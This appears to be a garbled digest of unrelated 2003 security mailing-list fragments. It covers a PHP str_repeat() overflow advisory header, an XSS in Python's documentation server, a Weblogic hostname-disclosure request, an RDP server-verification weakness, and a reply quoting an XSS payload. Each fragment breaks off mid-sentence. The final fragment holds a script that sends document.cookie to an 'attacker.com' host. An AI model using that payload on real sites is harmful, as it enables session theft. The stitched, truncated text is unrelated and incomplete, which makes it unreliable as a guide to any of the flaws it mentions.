//(#) Mordred Security Labs advisory
Release date: April 1, 2003
Name: Integer overflow in PHP str_repeat() function
Versions affected: all versions
Risk: average
Author: Sir Mordred ([EMAIL PROTECTED])
I. Description:
PHP is a widely-used general-purpose scripting language that is
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS in Python Documentation Server
product: Python 2.2.2 and 2.3a2 for Win32
vendor: http://www.python.org
risk: low
date: 04/02/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls:
Hi,
During a penentration test, I discovered that the BEA Weblogic Server
reveals it hostname (on windows machines NetBIOS name) while sending the
following request:
GET . HTTP/1.0\r\n\r\n
On older systems (Weblogic 7.0), a simple BLAH . BLAH\r\n\r\n will do
the same trick. BEA was
During extensive investigation of the Remote Desktop Protocol (RDP),
the protocol used to connect to Windows Terminal Services, we (Cendio
Systems) have found that although the information sent over the network is
encrypted, there is no verification of the identity of the server when
setting up
I haven't tested but I don't think addslashes() is a good solution here.
The same javascript can be executed without ' or , like this :
lt;name=alt;input type=hidden name=u
value=http://www.attacker.com/prova.phplt;/form
lt;scriptwindow.open(document.a.u.value+document.cookie)lt;/script
What do